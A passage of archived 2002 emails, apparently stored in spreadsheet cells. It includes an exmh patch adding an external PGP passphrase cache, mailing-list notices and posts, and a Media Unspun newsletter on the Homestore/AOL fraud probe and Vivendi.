 passphrase (everything which spits out the phrase on stdout is ok).
 i'd be happy if somebody with cvs access thinks that this stuff 
 is worth to be added and does so; apart from that i'm happy for 
 suggestions, comments or critique (mind you, i'm not exactly a special 
 friend of tcl so my code may leave things to be desired...)
 regards
 az
 --Multipart_Fri_Sep_27_14:42:27_2002-1
 Content-Type: text/plain; charset=US-ASCII
 Content-Disposition: attachment; filename="exmh-patch"
 Content-Transfer-Encoding: 8bit
 --- /usr/lib/exmh/extrasInit.tcl	Sat Mar  2 17:26:38 2002
 +++ ./extrasInit.tcl	Fri Sep 27 14:22:13 2002
 @@ -642,6 +642,18 @@
      {pgp(passtimeout) pgpPassTimeout 60 {Minutes to cache PGP passphrase}
  "Exmh will clear its memory of PGP passphrases after
  this time period, in minutes, has elapsed." }
 +{pgp(extpass) pgpExtPass OFF {Use external passphrase cache}
 +"If this is enabled, then exmh will use an external program to retrieve 
 +your passphrase when needed. pgpKeepPass and pgpPassTimeout will 
 +be ignored."}
 +{pgp(getextcmd) pgpGetExtCmd {/usr/bin/q-client get %s} {Method to query external passphrase cache}
 +"This external program is used to retrieve the passphrase for your key,
 +if pgpExtPass is active. The passphrase is expected on stdout.
 +The key id is substituted with %s (using format)." }
 +{pgp(delextcmd) pgpDelExtCmd {/usr/bin/q-client delete %s} {Method to invalidate external passphrase cache}
 +"This external program is used to delete the passphrase for your key
 +from the external cache, if pgpExtPass is active. 
 +The key id is substituted with %s (using format)." }
      }
      # Make sure we don't inherit a bad pgp(version) from a previous setup
 --- /usr/lib/exmh/pgpExec.tcl	Sat Mar  2 17:26:39 2002
 +++ ./pgpExec.tcl	Fri Sep 27 14:19:40 2002
 @@ -647,6 +647,33 @@
  proc Pgp_GetPass { v key } {
      global pgp
 +    if {[info exists pgp(extpass)] &amp;&amp; [set pgp(extpass)] \
 +	    &amp;&amp; [info exists pgp(getextcmd)]} {
 +	Exmh_Debug "Pgp_GetPass $v $key external"
 +	set keyid [lindex $key 0]
 +	set cmd [format $pgp(getextcmd) $keyid]
 +	while (1) {
 +	    Exmh_Debug "running cmd $cmd"
 +	    if [ catch {exec sh -c "$cmd"} result ] {
 +		Exmh_Debug "error running cmd: $result"
 +		Exmh_Status "Error executing external cmd" warn
 +		return {}
 +	    } else {
 +		if {[Pgp_Exec_CheckPassword $v $result $key]} {
 +		    return $result
 +		} else {
 +		    Exmh_Debug "bad passphrase"
 +		    if {[info exists pgp(delextcmd)]} {
 +			Exmh_Debug "trying to invalidate bad passphrase"
 +			if [catch {exec sh -c "[format $pgp(delextcmd) $keyid]"}] {
 +			    Exmh_Debug "invalidation failed"
 +			    return {}
 +			}
 +		    }
 +		}
 +	    }
 +	}
 +    } else {
      Exmh_Debug "Pgp_GetPass $v $key"
      if {[lsearch -glob [set pgp($v,privatekeys)] "[lindex $key 0]*"] &lt; 0} {
 @@ -695,6 +722,7 @@
              }
              return $password
          }
 +	}
      }
  }
 --Multipart_Fri_Sep_27_14:42:27_2002-1
 Content-Type: text/plain; charset=US-ASCII
 -- 
 + Alexander Zangerl + az@snafu.priv.at + DSA 42BD645D + (RSA 5B586291)
 Kind of like my 404K fund, "wealth not found." -- shrox
 --Multipart_Fri_Sep_27_14:42:27_2002-1--
 ------------=_1033130560-1199-5
 Content-Type: application/pgp-signature; name="signature.ng"
 Content-Disposition: inline; filename="signature.ng"
 Content-Transfer-Encoding: 7bit
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.2.0 (GNU/Linux)
 iD8DBQE9lFJBpy/2bEK9ZF0RAq/1AJwLmyZx/zs+FgJkmvcMeL57gewE6ACbBWj0
 OYCcSYWXynxRpVtCbDE1R3A=
 =T+T4
 -----END PGP SIGNATURE-----
 ------------=_1033130560-1199-5--
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: linux.ie mailing list memberships reminder
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a reminder, sent out once a month, about your linux.ie mailing
 list memberships.  It includes your subscription info and how to use
 it to change it or unsubscribe from a list.
 You can visit the URLs to change your membership status or
 configuration, including unsubscribing, setting digest-style delivery
 or disabling delivery altogether (e.g., for a vacation), and so on.
 In addition to the URL interfaces, you can also use email to make such
 changes.  For more info, send a message to the '-request' address of
 the list (for example, webdev-request@linux.ie) containing just the
 word 'help' in the message body, and an email message will be sent to
 you with instructions.
 If you have questions, problems, comments, etc, send them to
 listmaster@tuatha.org.  Thanks!
 Passwords for jm-webdev@jmason.org:
 List                                     Password // URL
 ----                                     --------  
 webdev@linux.ie                          foo       
 http://www.linux.ie/mailman/options/webdev/jm-webdev@jmason.org
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Underwater high-voltage photography
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85505975
 Date: Not supplied
 [IMG: http://www.craphound.com/images/electricball.jpg] Stefan sez: "My 
 brother's friend Sue plays with high voltage. The linked-to page shows the 
 gadget she used to photograph high voltage discharges in *water*." Link[1] 
 Discuss[2] (_Thanks, Stefan!_) 
 [1] http://community.webshots.com/album/8426665GzkjEytinE
 [2] http://www.quicktopic.com/boing/H/uzUstBTSpq7K
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bindings problem with current CVS code
</t>
  </si>
  <si>
    <t xml:space="preserve">I've had this binding in my ~/.exmh/exmhbindings for years:
 set {bindings(key,Flist_FindUnseen 1 ; Inc_PresortFinish)} &lt;Key-f&gt;
 After updating to the current code in CVS I get "bad key f" when 
 I hit the "f" key.  I can open the Bindings... Commands window 
 and define the binding.  It then works until I restart exmh.
 I suspect a parsing problem/change.  I'll try to look into this 
 tomorrow unless someone knows where the problem might be.
 --Hal
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [zzzzteana] Re: Argh!
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt;It's official, I'm a failure. 
 Same here.
 One 6th Form college colleague is Yvette Cooper, MP for Pontefract and Castleford, and Parliamentary Secretary at the Lord Chancellor's Department. A strange constituency for someone born and bred in rural Hampshire.
 A fellow pupil at school was Julie Fernandez who was in the fabulous soap 'Eldorado' and played Brenda in the recent series of 'The Office'
 Dave
 Govt wage slave in Manchester 
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: AOL Keyword: Fraud Probe
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format...
 ------------=_1033046883-23957-4
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 To view this newsletter in full-color, visit:
 http://newsletter.mediaunspun.com/index000020868.cfm
 Media Unspun
 What the Press is Reporting and Why (www.mediaunspun.com)
 -----------------------------------------------------------------
 September 26, 2002
 -----------------------------------------------------------------
 IN THIS ISSUE
 -----------------------------------------------------------------
 * AOL KEYWORD: FRAUD PROBE
 * VIVENDI MEETS THE NEW BOSS
 * OTHER STORIES
 -----------------------------------------------------------------
 EDITOR'S NOTE
 -----------------------------------------------------------------
 Is Media Unspun useful to you? Then pass it on to a colleague.
 The more readers we have, the more successful we'll be. The more 
 successful we are, the more useful we can be to you. Pass it
 on!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ADVERTISEMENT
 -----------------------------------------------------------------
 Pop!Tech 2002
 October 18 - 20, 2002: Camden, Maine
 Join 500 big thinkers to discuss
 the collision of technology and culture
 Register now at: http://www.poptech.org
 -----------------------------------------------------------------
 AOL KEYWORD: FRAUD PROBE
 -----------------------------------------------------------------
 Another three bite the dust. Three former executives from real
 estate dot-com Homestore have agreed to plead guilty to criminal 
 charges and repay $4.6 million in stock gains. What's more
 interesting is that they'll cooperate with an investigation into 
 AOL's role in the dubious dealing. This is the most real estate
 drama you'll get this week without renting "Glengarry Glen
 Ross."
 Homestore's former COO was charged with wire fraud and
 conspiracy to commit securities fraud (up to 10 years in jail),
 the former CFO with just the conspiracy charge (up to five
 years), and an ex-VP with insider trading (less time, but
 unknown). The big accusation here is "round tripping," in which
 Homestore would buy goods from a company as long as the company
 then spent most of the money on AOL ads. Then AOL would
 supposedly spend the same amount of money at Homestore, "thus
 allowing Homestore effectively to 'buy' revenue using its own
 cash," explained the Wall Street Journal.
 Homestore has become a cause celebre for Attorney General John
 Ashcroft, who held a press conference to emphasize that the Bush 
 administration really means it about this corporate clean-up
 thing. Neither Ashcroft, the Justice Department, nor the SEC
 named names, referring only to Homestore's relationship with "a
 major media company." Nice try for anonymity, but AOL Time
 Warner was the only major media company Homestore dealt with,
 observed the New York Times. Now the heat's on AOL while
 investigators try and figure out how much of AOL's revenue was
 inflated like a Thanksgiving Day Parade float.
 The L.A. Times' sources said AOL execs pointed the finger at
 former company dealmaker Eric Keller. The Journal led with, and
 expanded on, this info. It seems two of the three busted
 Homestore execs are expected to say Keller helped Homestore do
 its round-tripping, and that some AOL ad revenue that looked
 legit on paper really came from Homestore. Keller has already
 been pink-slipped for shady deals with Homestore and another
 company; his boss got booted last month for possible
 book-cooking. 
 So where's the perp walk? The umbrella stand? The theatrics that 
 make the corporate crime beat great? We're kidding (mostly), but 
 that could be why overseas outlets barely noticed this
 comparatively tame example of American excess. The Journal had
 one amusing tidbit, though: After Keller got fired, AOL vice
 chairman Ted Leonsis hired him as a consultant for the hockey
 team the Washington Capitals, of which Leonsis is the majority
 owner. Leonsis said he let Keller go after finding out why he
 lost his AOL job, but Keller still picked up his Capitals phone
 as of Wednesday. As outrageous severance packages go, it's no
 Jack Welsh/GE $9 million annual pension, but it'll have to do. - 
 Jen Muehlbauer
 Homestore Executives Agree to Guilty Pleas 
 http://www.washingtonpost.com/wp-dyn/articles/A3165-2002Sep25.html
 Homestore, AOL Ad Deals Yield Guilty Pleas (USA Today)
 http://tinyurl.com/1nbz
 U.S. Focuses on Executive at Homestore
 http://www.nytimes.com/2002/09/26/technology/26AOL.html
 Homestore's Ex-Execs to Aid Investigators
 http://www.latimes.com/business/la-fi-homestore26sep26,0,5107257.story
 Probe of Homestore Turns To an Ex-AOL Executive
 http://online.wsj.com/article/0,,SB1032971619118707713,00.html
 (Paid registration required.)
 Jack Welch's Very Golden Years 
 http://www.fool.com/news/Take/2002/mft/mft02090903.htm
 Glengarry Glen Ross 
 http://us.imdb.com/Title?0104348
 -----------------------------------------------------------------
 ADVERTISEMENT
 -----------------------------------------------------------------
 What's Really Going on at Microsoft? Mary Jo Foley delivers
 unmatched reporting and insight with MICROSOFT WATCH.  Track
 initiatives like .Net, Palladium, Longhorn, Trinity, Yukon;
 release dates, competitive moves, people. For a FREE 14-day
 trial subscription:
 https://ziffdavis.omeda.com/zm/msw/msw.cgi?intro2&amp;p=5UCXA00075
 -----------------------------------------------------------------
 VIVENDI MEETS THE NEW BOSS
 -----------------------------------------------------------------
 What does Vivendi want to be when it grows up? The media can't
 figure it out. Can CEO Jean-Rene Fourtou? His fuzziness at
 yesterday's board meeting got reporters to wondering. If he
 can't explain his vision, does that mean he's lacking the 20/20
 clarity that observers on two continents were banking on? For
 Fourtou, worse than the Monsieur Magoo accusations are the
 comparisons, starting to bubble through media accounts, that he
 resembles -- wait, we're rubbing our eyes -- the vilified
 Jean-Marie Messier.
 Media watchers can rate reporters' confusion over Fourtou's
 latest pronouncements by tallying the amount of space outlets
 devoted to their coverage of the mess. The New York Times ran 24 
 paragraphs on the board meeting -- and then filed another 19 in
 an analysis that sought to examine what the latest moves meant.  
 The Financial Times posted two articles on the meeting and still 
 had more to say, lambasting Fourtou in Lex, the peach paper's
 influential column. Lex called the exec's update "more like a
 rambling fireside chat ... than a strategy presentation."
 There's little that's clear about what's ahead for Vivendi. The
 company now says that it will dispose of 12 billion euros worth
 of assets over the next 18 months. Here's how reporters
 examining the tea leaves read the current plan: Out are Telepiu, 
 an Italian pay-TV operation, and Canal Plus Technologies, a
 maker of set-top boxes. On the way out are Vivendi's publishing
 properties, which include Houghton Mifflin, and a minority stake 
 in a PC gamemaker. That leaves Vivendi's stake in telecom, via
 its Cegetel investment, and its Universal entertainment
 properties, and -- hey, wait a minute, wasn't that Messier's
 plan, the New York Times wondered by way of an analyst's quote.
 To confuse matters further, News Corp., the alleged partner in
 the done deal for Telepiu, says no deal is in place, according
 to the Financial Times. As for Cegetel, Fourtou said he'd
 consider selling Vivendi's 44% stake; then again, maybe he'll
 increase it. And that was all in one post-meeting telephone
 conference. 
 The only decision by Vivendi in which Fourtou seemed sure was
 his claim that the company won't pay any severance to Messier.
 "He enjoyed making deals too much and overpaid," the Guardian
 quoted Fourtou as saying, and then adding, "This all went to his 
 head." 
 With heads other than Messier's now in question, is Vivendi's
 viability again in doubt? Outlets today report that Enron's
 logo, the oversize capital "E" that stood outside its
 headquarters, sold at auction for $44,000. How many euros might
 a V bring? - Deborah Asbrand
 Vivendi Will Move Quickly to Sell Many Assets
 http://www.nytimes.com/2002/09/26/business/26VIVE.html
 What's New at Vivendi? Depends Who's Talking
 http://www.nytimes.com/2002/09/26/business/26PLAC.html
 Vivendi in Move to Sell Raft of Assets (Financial Times)
 http://tinyurl.com/1ncq
 Vivendi Board to Deny Messier Severance Pay (Financial Times)
 http://tinyurl.com/1ncs
 Lex: Vivendi Universal (Financial Times) 
 http://tinyurl.com/1ncw
 News Corp Counters Report of Telepiu Sale (Financial Times)
 http://tinyurl.com/1ncy
 Vivendi Aims to Realise Eu12bn from Asset Sales (Daily
 Telegraph)
 http://tinyurl.com/1nd0
 Messier 'won't get a penny' 
 http://media.guardian.co.uk/city/story/0,7497,799283,00.html
 Vivendi Shakes Up Board, Denies Messier's Severance
 http://www.latimes.com/business/la-fi-vivendi26sep26,0,481695.story
 Enron Auctions Off Furniture and Famous 'E'
 http://www.nytimes.com/2002/09/26/business/26ENRO.html
 -----------------------------------------------------------------
 OTHER STORIES
 -----------------------------------------------------------------
 HP Boosts Layoffs By 1,800
 http://www.siliconvalley.com/mld/siliconvalley/4151819.htm
 Former WorldCom Controller To Plead Guilty To Two counts (Wall
 Street Journal)
 http://www.msnbc.com/news/813048.asp
 Tyco Rewarded an Executive During a Grand Jury Inquiry
 http://www.nytimes.com/2002/09/26/business/26PAY.html
 Bell Labs Researcher Falsified Experiments (AP)
 http://www.chron.com/cs/CDA/story.hts/tech/news/1591103
 Germany's Neuer Markt to close
 http://news.bbc.co.uk/2/hi/business/2283068.stm
 Resources Dry Up As Joblessness Drags On (USA Today)
 http://tinyurl.com/1nc1
 Merrill Aide to Plead Guilty (Wall Street Journal)
 http://www.msnbc.com/news/813195.asp?0dm=B21AB
 Enron Ex-CFO Clears His Throat For Feds 
 http://www.nypost.com/business/57905.htm
 Music Labels Seek Piracy Payback
 http://www.latimes.com/business/la-fi-napster26sep26001431,0,388519.story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http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org
 To receive future messages in HTML format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org%2Chtm
 To change your subscriber information, use this link:
 http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org
 ------------=_1033046883-23957-4
 Content-Type: text/html; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;title&gt;Media Unspun&lt;/title&gt;
 &lt;!--  
 **********************************************************
 If you can read this message but the rest of the email 
 contains strange characters, your email program is not
 capable of displaying HTML email. Use your browser to read the
 complete newsletter online at: 
    http://newsletter.mediaunspun.com/
 To receive future messages in plain text format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org%2Ctxt
 **********************************************************
 CREATED: September 26, 2002 
 --&gt;
 &lt;meta name="description" content=""&gt;
 &lt;meta name="keywords" content=""&gt;
 &lt;meta name="GENERATOR" content="iMakeNews"&gt;
 &lt;meta name="robots" content="all"&gt;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.a269926923529985-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a269926923529985-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a269926923529985-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a269926923529985-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a269926923529985-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a269926923529985-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a269926923529985-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a269926923529985-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a269926923529985-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a269926923529985-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a269926923529985-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a269926923523143-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a269926923523143-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a269926923523143-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a269926923521810-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a269926923521810-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a269926923521810-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Footer Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a269926923549919-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a269926923549919-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a269926923549919-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a269926923549919-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a269926923549919-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a269926923549919-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a269926923549919-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a269926923549919-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a269926923549919-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a269926923549919-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a269926923549919-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}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000020868.cfm&amp;XXDESXXissue_id=20868&amp;XXDESXXtitle=Media%20Unspun"
 			 class="a269926923529985-footer_tellafriend"&gt;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src="http://a298.g.akamai.net/7/298/5382/092602092354/www.imakenews.com/mediaunspun/mediaunspun_logo.GIF" BORDER="0" alt="Media Unspun"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Thursday, September 26, 2002
 				&lt;/font&gt;
 			&lt;/td&gt;
 				&lt;td align="center" width="34%"&gt;
 			&lt;/td&gt;
 				&lt;td align="right" width="33%"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 1 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table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HREF="#a96666"
 						class="a269926923523143-contents_article_title"
 				&gt;
 			AOL Keyword: Fraud Probe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HREF="#a96667"
 						class="a269926923521810-contents_article_title"
 				&gt;
 			Vivendi Meets the New Boss
 			&lt;/a&gt;&lt;/font&gt;
 			&lt;br&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;img src="http://www.imakenews.com/eletra/empty.gif" height="1" width="1"&gt;&lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 			&lt;font face="Verdana,Arial" size="1"&gt;
 				&lt;A HREF="#a96668"
 						class="a269926923521810-contents_article_title"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Editor's Note
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Is Media Unspun useful to you? Then pass it on to a colleague. The more readers we have, the more successful we'll be. The more successful we are, the more useful we can be to you. Pass it on!&lt;/P&gt;&lt;P&gt;
 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&lt;P&gt;Pop!Tech 2002&lt;br&gt;
 October 18 - 20, 2002: Camden, Maine&lt;br&gt;
 Join 500 big thinkers to discuss&lt;br&gt;
 the collision of technology and culture&lt;br&gt;
 Register now at: &lt;A HREF="http://www.poptech.org"&gt;http://www.poptech.org&lt;/A&gt; &lt;br&gt;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name="a96666"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			AOL Keyword: Fraud Probe
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Another three bite the dust. Three former executives from real estate dot-com Homestore have agreed to plead guilty to criminal charges and repay $4.6 million in stock gains. What's more interesting is that they'll cooperate with an investigation into AOL's role in the dubious dealing. This is the most real estate drama you'll get this week without renting "Glengarry Glen Ross."&lt;/P&gt;&lt;P&gt;
 Homestore's former COO was charged with wire fraud and conspiracy to commit securities fraud (up to 10 years in jail), the former CFO with just the conspiracy charge (up to five years), and an ex-VP with insider trading (less time, but unknown). The big accusation here is "round tripping," in which Homestore would buy goods from a company as long as the company then spent most of the money on AOL ads. Then AOL would supposedly spend the same amount of money at Homestore, "thus allowing
 Homestore effectively to 'buy' revenue using its own cash," explained the Wall Street Journal.&lt;/P&gt;&lt;P&gt;
 Homestore has become a cause celebre for Attorney General John Ashcroft, who held a press conference to emphasize that the Bush administration really means it about this corporate clean-up thing. Neither Ashcroft, the Justice Department, nor the SEC named names, referring only to Homestore's relationship with "a major media company." Nice try for anonymity, but AOL Time Warner was the only major media company Homestore dealt with, observed the New York Times. Now the heat's on AOL while
 investigators try and figure out how much of AOL's revenue was inflated like a Thanksgiving Day Parade float.&lt;br&gt;
  &lt;br&gt;
 The L.A. Times' sources said AOL execs pointed the finger at former company dealmaker Eric Keller. The Journal led with, and expanded on, this info. It seems two of the three busted Homestore execs are expected to say Keller helped Homestore do its round-tripping, and that some AOL ad revenue that looked legit on paper really came from Homestore. Keller has already been pink-slipped for shady deals with Homestore and another company; his boss got booted last month for possible book-cooking.
 &lt;/P&gt;&lt;P&gt;
 So where's the perp walk? The umbrella stand? The theatrics that make the corporate crime beat great? We're kidding (mostly), but that could be why overseas outlets barely noticed this comparatively tame example of American excess. The Journal had one amusing tidbit, though: After Keller got fired, AOL vice chairman Ted Leonsis hired him as a consultant for the hockey team the Washington Capitals, of which Leonsis is the majority owner. Leonsis said he let Keller go after finding out why he
 lost his AOL job, but Keller still picked up his Capitals phone as of Wednesday. As outrageous severance packages go, it's no Jack Welsh/GE $9 million annual pension, but it'll have to do. - Jen Muehlbauer&lt;/P&gt;&lt;P&gt;
 Homestore Executives Agree to Guilty Pleas &lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A3165-2002Sep25.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A3165-2002Sep25.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Homestore, AOL Ad Deals Yield Guilty Pleas (USA Today)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1nbz"&gt;http://tinyurl.com/1nbz&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 U.S. Focuses on Executive at Homestore&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/09/26/technology/26AOL.html"&gt;http://www.nytimes.com/2002/09/26/technology/26AOL.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Homestore's Ex-Execs to Aid Investigators&lt;br&gt;
 &lt;A HREF="http://www.latimes.com/business/la-fi-homestore26sep26,0,5107257.story"&gt;http://www.latimes.com/business/la-fi-homestore26sep26,0,5107257.story&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Probe of Homestore Turns To an Ex-AOL Executive&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB1032971619118707713,00.html"&gt;http://online.wsj.com/article/0,,SB1032971619118707713,00.html&lt;/A&gt; &lt;br&gt;
 (Paid registration required.)&lt;/P&gt;&lt;P&gt;
 Jack Welch's Very Golden Years &lt;br&gt;
 &lt;A HREF="http://www.fool.com/news/Take/2002/mft/mft02090903.htm"&gt;http://www.fool.com/news/Take/2002/mft/mft02090903.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Glengarry Glen Ross &lt;br&gt;
 &lt;A HREF="http://us.imdb.com/Title?0104348"&gt;http://us.imdb.com/Title?0104348&lt;/A&gt; &lt;/P&gt;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&lt;P&gt;What's Really Going on at Microsoft? Mary Jo Foley delivers unmatched reporting and insight with MICROSOFT WATCH.  Track initiatives like .Net, Palladium, Longhorn, Trinity, Yukon; release dates, competitive moves, people. For a FREE 14-day trial subscription:&lt;br&gt;
 &lt;A HREF="https://ziffdavis.omeda.com/zm/msw/msw.cgi?intro2&amp;p=5UCXA00075"&gt;https://ziffdavis.omeda.com/zm/msw/msw.cgi?intro2&amp;p=5UCXA00075&lt;/A&gt; &lt;/P&gt;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name="a96667"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Vivendi Meets the New Boss
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;What does Vivendi want to be when it grows up? The media can't figure it out. Can CEO Jean-Ren&amp;eacute; Fourtou? His fuzziness at yesterday's board meeting got reporters to wondering. If he can't explain his vision, does that mean he's lacking the 20/20 clarity that observers on two continents were banking on? For Fourtou, worse than the Monsieur Magoo accusations are the comparisons, starting to bubble through media accounts, that he resembles -- wait, we're rubbing our eyes -- the
 vilified Jean-Marie Messier.&lt;/P&gt;&lt;P&gt;
 Media watchers can rate reporters' confusion over Fourtou's latest pronouncements by tallying the amount of space outlets devoted to their coverage of the mess. The New York Times ran 24 paragraphs on the board meeting -- and then filed another 19 in an analysis that sought to examine what the latest moves meant.  The Financial Times posted two articles on the meeting and still had more to say, lambasting Fourtou in Lex, the peach paper's influential column. Lex called the exec's update "more
 like a rambling fireside chat ... than a strategy presentation."&lt;/P&gt;&lt;P&gt;
 There's little that's clear about what's ahead for Vivendi. The company now says that it will dispose of 12 billion euros worth of assets over the next 18 months. Here's how reporters examining the tea leaves read the current plan: Out are Telepiu, an Italian pay-TV operation, and Canal Plus Technologies, a maker of set-top boxes. On the way out are Vivendi's publishing properties, which include Houghton Mifflin, and a minority stake in a PC gamemaker. That leaves Vivendi's stake in telecom,
 via its Cegetel investment, and its Universal entertainment properties, and -- hey, wait a minute, wasn't that Messier's plan, the New York Times wondered by way of an analyst's quote. To confuse matters further, News Corp., the alleged partner in the done deal for Telepiu, says no deal is in place, according to the Financial Times. As for Cegetel, Fourtou said he'd consider selling Vivendi's 44% stake; then again, maybe he'll increase it. And that was all in one post-meeting telephone
 conference. &lt;/P&gt;&lt;P&gt;
 The only decision by Vivendi in which Fourtou seemed sure was his claim that the company won't pay any severance to Messier. "He enjoyed making deals too much and overpaid," the Guardian quoted Fourtou as saying, and then adding, "This all went to his head." &lt;/P&gt;&lt;P&gt;
 With heads other than Messier's now in question, is Vivendi's viability again in doubt? Outlets today report that Enron's logo, the oversize capital "E" that stood outside its headquarters, sold at auction for $44,000. How many euros might a V bring? - Deborah Asbrand&lt;/P&gt;&lt;P&gt;
